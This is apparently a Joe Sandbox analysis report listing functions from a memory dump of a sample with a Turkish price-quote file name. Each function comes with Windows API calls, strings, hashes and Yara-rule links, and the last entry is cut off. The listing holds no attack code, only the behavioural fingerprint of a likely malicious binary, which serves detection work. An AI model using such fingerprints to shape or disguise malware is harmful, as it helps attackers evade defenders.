Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 6ffd1b1a5a7399df1c548e77d4f4d796e38ab529fec2405dbb235a2d6292ca7c
Instruction ID: 255c8f923a0bcb07e14885aacaab8611df78da46c6428823e964c89856f92669
Opcode Fuzzy Hash: 6ffd1b1a5a7399df1c548e77d4f4d796e38ab529fec2405dbb235a2d6292ca7c
Instruction Fuzzy Hash: 77410876A01309EFDF10DF94D884AEABBF9FF49364F044129E915A7290D730AE95CB50

Uniqueness

Uniqueness Score: -1.00%

Function 009E1DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD

Part of subcall function 009E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 009E3CCA

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 009E1E66
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 009E1E79
SendMessageW.USER32(?,00000189,?,00000000), ref: 009E1EA9

Part of subcall function 00986B57: _wcslen.LIBCMT ref: 00986B6A

Strings

ComboBox, xrefs: 009E1DF0
ListBox, xrefs: 009E1E25

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: c310e4c655f258ff25d1edfa24aa5f6edd931440b32fbfad346cfc9c4e068a6f
Instruction ID: 9c35b9785022131bdc066f452b709da80fc24ec81b2267871b08de4a0eeea1dd
Opcode Fuzzy Hash: c310e4c655f258ff25d1edfa24aa5f6edd931440b32fbfad346cfc9c4e068a6f
Instruction Fuzzy Hash: E5212371A00144BFDB15ABB5CC49EFFB7B9EF85360B148519F826A72E1DB384D0A8720

Uniqueness

Uniqueness Score: -1.00%

Function 00A12F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00A12F8D
LoadLibraryW.KERNEL32(?), ref: 00A12F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00A12FA9
DestroyWindow.USER32(?), ref: 00A12FB1

Strings

SysAnimate32, xrefs: 00A12F68

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 67540b6390a2d64f7d92c9896b7975764ab0ddb83de6898268355cf1a30f665d
Instruction ID: 6651d5ce17af9d2f938a8370f4994ad32f53ad0f2155e8a3670f7111ffbee7c6
Opcode Fuzzy Hash: 67540b6390a2d64f7d92c9896b7975764ab0ddb83de6898268355cf1a30f665d
Instruction Fuzzy Hash: 16218C71204209ABEB209FA4DC84FFB77BDEB99364F104618F950D6190D771DCB29760

Uniqueness

Uniqueness Score: -1.00%

Function 009A4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,009A4D1E,009B28E9,?,009A4CBE,009B28E9,00A488B8,0000000C,009A4E15,009B28E9,00000002), ref: 009A4D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009A4DA0
FreeLibrary.KERNEL32(00000000,?,?,?,009A4D1E,009B28E9,?,009A4CBE,009B28E9,00A488B8,0000000C,009A4E15,009B28E9,00000002,00000000), ref: 009A4DC3

Strings

mscoree.dll, xrefs: 009A4D86
CorExitProcess, xrefs: 009A4D98

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a92e5c82566d96527eab7dd5e3b43919713edcf74edc9c19bd73acdf8fc562da
Instruction ID: 8416ef6afd8f6a5751c30f5cbe3dd7f4a01c6a3b7c20766a14ce29588e079991
Opcode Fuzzy Hash: a92e5c82566d96527eab7dd5e3b43919713edcf74edc9c19bd73acdf8fc562da
Instruction Fuzzy Hash: 8AF04435580218BBDB119F94DC49BDDBBB9EF85761F044164F805A6190CB759941CAD0

Uniqueness

Uniqueness Score: -1.00%

Function 00984E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00984EDD,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00984EAE
FreeLibrary.KERNEL32(00000000,?,?,00984EDD,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984EC0

Strings

Wow64DisableWow64FsRedirection, xrefs: 00984EA8
kernel32.dll, xrefs: 00984E94

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 81612ea1894030b9bcc87f831065e64b07fc697b6584aed6e2aa41268b745ce8
Instruction ID: 7feee1776254bbd97b3258ecd9e5fbda593bd3c39ed662de898b4a61f624d7a8
Opcode Fuzzy Hash: 81612ea1894030b9bcc87f831065e64b07fc697b6584aed6e2aa41268b745ce8
Instruction Fuzzy Hash: F1E0CD36AC55237BD2316B656C18B9F665CBFC1F737054215FC00E2301DB64CD0241A1

Uniqueness

Uniqueness Score: -1.00%

Function 00984E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,009C3CDE,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00984E74
FreeLibrary.KERNEL32(00000000,?,?,009C3CDE,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 00984E6E
kernel32.dll, xrefs: 00984E5B

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: c264ab2363bf0889ea0f13abf060f5ef0ab5e83c53bab4e55b02980419319f29
Instruction ID: 94f03d3eb1c7e41a45f8e96f72439a544d6ef83d9bcd6769ec6bef958f9dc66c
Opcode Fuzzy Hash: c264ab2363bf0889ea0f13abf060f5ef0ab5e83c53bab4e55b02980419319f29
Instruction Fuzzy Hash: 45D0C23658262277CA222B247C08DCB2A1CBF81F313054610B801E2211CF24CD0282D1

Uniqueness

Uniqueness Score: -1.00%

Function 00A0A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00A0A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A0A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00A0A468
CloseHandle.KERNEL32(?), ref: 00A0A63D

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 8c086c7110193071ad6e6de33c3eb47fc13d4b334c5980f11385a3a76cebc8ed
Instruction ID: 9aa4aca7a4f40219e1507c68bc0a2f018ee050ba711fa84e0bd599e90e4ab2e1
Opcode Fuzzy Hash: 8c086c7110193071ad6e6de33c3eb47fc13d4b334c5980f11385a3a76cebc8ed
Instruction Fuzzy Hash: F9A19271604300AFE720EF28D886F2AB7E5AF94714F14885DF55A9B3D2D771EC418B92

Uniqueness

Uniqueness Score: -1.00%

Function 009BBB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00A23700), ref: 009BBB91
WideCharToMultiByte.KERNEL32(00000000,00000000,00A5121C,000000FF,00000000,0000003F,00000000,?,?), ref: 009BBC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00A51270,000000FF,?,0000003F,00000000,?), ref: 009BBC36
_free.LIBCMT ref: 009BBB7F

Part of subcall function 009B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000), ref: 009B29DE
Part of subcall function 009B29C8: GetLastError.KERNEL32(00000000,?,009BD7D1,00000000,00000000,00000000,00000000,?,009BD7F8,00000000,00000007,00000000,?,009BDBF5,00000000,00000000), ref: 009B29F0

_free.LIBCMT ref: 009BBD4B

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: ee4880a7f909bc01b9c42307839f075983f06b5dc73ce278c7723e5f8b2f17d9
Instruction ID: 656fb93c5572270a6a53aa9887b4080418459e772338b726823a121732755ef9
Opcode Fuzzy Hash: ee4880a7f909bc01b9c42307839f075983f06b5dc73ce278c7723e5f8b2f17d9
Instruction Fuzzy Hash: 2C51A671900219AFCB10DFA99E81AFEBBBCFB81770F10466AE554D71D1EBB09E418B50

Uniqueness

Uniqueness Score: -1.00%

Function 009EE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 009EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009ECF22,?), ref: 009EDDFD

Part of subcall function 009EDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009ECF22,?), ref: 009EDE16

Part of subcall function 009EE199: GetFileAttributesW.KERNEL32(?,009ECF95), ref: 009EE19A

lstrcmpiW.KERNEL32(?,?), ref: 009EE473
MoveFileW.KERNEL32(?,?), ref: 009EE4AC
_wcslen.LIBCMT ref: 009EE5EB
_wcslen.LIBCMT ref: 009EE603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 009EE650

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: cb0d7f68bb6a755deb66f324332ec5e23cc5cf4e94f684ab9265fd16b46e16cf
Instruction ID: a1a49416dfc05210d6bf06c00746fc7843c65d70affd13ea63962942e924a75d
Opcode Fuzzy Hash: cb0d7f68bb6a755deb66f324332ec5e23cc5cf4e94f684ab9265fd16b46e16cf
Instruction Fuzzy Hash: 165173B24083859BC725EB90DC85AEFB3ECAFC5350F00491EF589D3191EF75A6888766

Uniqueness

Uniqueness Score: -1.00%

Function 00A0B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD

Part of subcall function 00A0C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A0B6AE,?,?), ref: 00A0C9B5
Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0C9F1
Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0CA68
Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A0BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A0BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A0BB63
RegCloseKey.ADVAPI32(?,?), ref: 00A0BBA6
RegCloseKey.ADVAPI32(00000000), ref: 00A0BBB3

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: b33d253369d085e47cf5a59a67d1580c2abda32871ecd8189a3fa4e6aeab9842
Instruction ID: 3e3a2a54f159c52b17b8e6b75dfed78b0db6de24ef2f409a0d4cc4bb404dcdb7
Opcode Fuzzy Hash: b33d253369d085e47cf5a59a67d1580c2abda32871ecd8189a3fa4e6aeab9842
Instruction Fuzzy Hash: 0961BF31218205AFD314DF24D590F2ABBE5FF85348F14895CF49A8B2A2DB31ED45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 009E8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009E8BCD
VariantClear.OLEAUT32 ref: 009E8C3E
VariantClear.OLEAUT32 ref: 009E8C9D
VariantClear.OLEAUT32(?), ref: 009E8D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 009E8D3B

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 8b1de9c69cd7c85493fbe455cc4b5b6fcb5d4e24aaad0c39c718c11bc03504ad
Instruction ID: 9458d7dc6bec4920f1953586f929d6925f41107e424c18d0038c3cb8a2672759
Opcode Fuzzy Hash: 8b1de9c69cd7c85493fbe455cc4b5b6fcb5d4e24aaad0c39c718c11bc03504ad
Instruction Fuzzy Hash: 385178B5A00659EFCB10CFA9C884AAAB7F9FF89310B158559F949DB350E730E911CF90

Uniqueness

Uniqueness Score: -1.00%

Function 009F8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009F8BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 009F8BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 009F8C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 009F8C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 009F8C5F

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: e5170f1780574aab3ede0a242dbc6f5180894fae4c3ce9648430dc0270982c59
Instruction ID: 99bcf0d2cb9b1d54bea9200ca960cd985a6c0145c6952d4c6f9f26586b6a975a
Opcode Fuzzy Hash: e5170f1780574aab3ede0a242dbc6f5180894fae4c3ce9648430dc0270982c59
Instruction Fuzzy Hash: 9E514035A002199FCB05EF54C881E6EBBF5FF49314F088458E949AB362DB35ED51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A08EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00A08F40
GetProcAddress.KERNEL32(00000000,?), ref: 00A08FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00A08FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00A09032
FreeLibrary.KERNEL32(00000000), ref: 00A09052

Part of subcall function 0099F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,009F1043,?,7644E610), ref: 0099F6E6
Part of subcall function 0099F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,009DFA64,00000000,00000000,?,?,009F1043,?,7644E610,?,009DFA64), ref: 0099F70D

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: f004a7aa46eba75f4d9f06a569e82fea61e4687f7f93a77591905cab586b96ae
Instruction ID: b5679399c1e29943a75a4cf9e87693b24a105f893199d441c043e3a907ad754c
Opcode Fuzzy Hash: f004a7aa46eba75f4d9f06a569e82fea61e4687f7f93a77591905cab586b96ae
Instruction Fuzzy Hash: 5C514035604209DFC715EF68D4949ADBBF1FF49324B0880A8E8459B7A2DB31ED86CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A16B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00A16C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00A16C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00A16C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,009FAB79,00000000,00000000), ref: 00A16C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00A16CC7

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: eb991aedd81e60ec088850f9fc70fe48fdd88f828f932828dd60a388853a0aa3
Instruction ID: d49461715a3f665373127f938a997e5f8b334d203e3d57ad6810a72ae9e5539a
Opcode Fuzzy Hash: eb991aedd81e60ec088850f9fc70fe48fdd88f828f932828dd60a388853a0aa3
Instruction Fuzzy Hash: 4B41B439644104AFD724CF68CD58FE97BA9EB09360F154268F995E72E0D371AD81CA90

Uniqueness

Uniqueness Score: -1.00%

Function 009B2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 009B20C3
_free.LIBCMT ref: 009B20E3

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: a911f91c0ea6f5d1bd1705ce6dbcdfd6be18244bdf663fbf084acd7b6fb9e472
Instruction ID: 95740bfd6eed466660426b55a6866876260bb165b1d1c611384f683e26ad2079
Opcode Fuzzy Hash: a911f91c0ea6f5d1bd1705ce6dbcdfd6be18244bdf663fbf084acd7b6fb9e472
Instruction Fuzzy Hash: EB41E476A00200AFCB24DFB8CA81A9DB7F5EFC9324F154568E515EB355DB31AD01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0099912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00999141
ScreenToClient.USER32(00000000,?), ref: 0099915E
GetAsyncKeyState.USER32(00000001), ref: 00999183
GetAsyncKeyState.USER32(00000002), ref: 0099919D

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: ff0c9822d4cffef1541b35c0ca393e8d53ed66f486da54253beab1e0f5feef4a
Instruction ID: c91e704ce05efdb545e71ad33230c90237432ede2965eea9ba572a879be58f01
